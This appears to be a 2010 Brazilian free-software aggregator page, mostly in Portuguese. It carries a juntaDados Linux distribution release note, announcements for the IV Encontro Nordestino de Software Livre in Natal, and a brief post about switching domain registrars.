Esta nova revisão da distribuição juntaDados traz as principais ferramentas para produção audiovisual com muitas novidades e atualizações de segurança. Atualização em todas as ferramentas e no sistema base, melhorias na tradução para o português do Brasil e suporte a novos dispositivos e periféricos (Hardware) com a adoção do kernel linux 2.6.35.4-juntadados. Esta versão busca oferecer uma interface mais simples, amigável, atualizada e totalmente voltada para as atividades dos Pontos de Cultura, ações de Inclusão Digital e afins. Esta distribuição é baseada no Ubuntu 10.04.1 LTS (Lucid Lynx) e todos os códigos-fontes das ferramentas utilizadas, incluindo do kernel linux, estão disponíveis livremente nos repositórios Ubuntu.

leia mais



Rafael Gomes: Abertas as Inscrições para o IV Encontro Nordestino de Software Livre

16 de Setembro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Estão abertas as inscrições para o IV Encontro Nordestino de Software Livre & IV Encontro Potiguar de Software Livre (IV ENSL), evento que será realizado em Natal – Rio Grande do Norte, nos dias 5 e 6 de novembro de 2010 (sexta e sábado).

As inscrições do evento ocorrem em dois lotes. O primeiro lote promocional visa estimular a participação, principalmente, de estudantes e também de caravanas. Logo, até o dia 07 de outubro, estudantes e grupos de no mínimo 10 pessoas pagam apenas R$20,00, enquanto a inscrição avulso para profissionais custa apenas R$40,00. Será exigida dos estudantes a comprovação de matrícula no ato do credenciamento.

O segundo lote de inscrições, que corresponde ao período de 08 a 31 de outubro, tem como valores R$40,00 para estudantes e R$80,00 para profissionais. Atenção: este período não prevê desconto nas inscrições para as caravanas.

A programação do evento conta com palestrantes convidados e também com a colaboração da comunidade, que pode participar submetendo suas propostas de palestras até o dia 20 de setembro e as propostas de artigos científicos até o dia 27 de setembro para o I WPeDSL. Em paralelo, também acontecem o VII Fórum GNOME e o III Fórum KDE Brasil – Edição Nordeste.

Fiquem atentos às datas e nos vemos em Natal, uma bela cidade conhecida por ser a localidade com mais dias de sol do Brasil!

A organização do IV ENSL



Tiago Bortoletto Vaz: “SORRY TO SEE YOU GO…”

14 de Setembro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

It’s finally done. For several reasons I moved all my domains from GoDaddy to Gandi.net.

If you are not convinced, so try this. At least you’ll understand the real meaning of brainless marketing.




Mônica Paz: Chamada de palestras do IV Encontro Nordestino de Software Livre até 20/09

14 de Setembro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

A organização do IV Encontro Nordestino de Software Livre & IV Encontro Potiguar de Software Livre (IV ENSL) lembra sobre o período de submissão de propostas de palestras, que se encerra na próxima segunda-feira, dia 20 de setembro de 2010.

Ensl-full

Serviço:

  • O que: IV Encontro Nordestino de Software Livre
  • Onde: Natal, Rio Grande do Norte
  • Quando: 5 e 6 de novembro de 2010

Veja mais algumas datas importantes do IV ENSL:

  • Primeiro período de inscrições (promocional): até 07 de outubro (Abertura em breve)
  • Prazo limite para submissões de palestras: 20 de setembro ( ATENÇÃO! )
  • Prazo limite para submissões de artigos para o I WPeDSL: 27 de setembro
  • Divulgação dos resultados das palestras aceitas: 28 de setembro
  • Segundo período de inscrições: 08 a 31 de outubro
  • Divulgação dos resultados dos artigos aceitos: 17 de outubro

Mais informações, viste o site http://www.ensl.org.br.



Tags deste artigo: nordeste psl bahia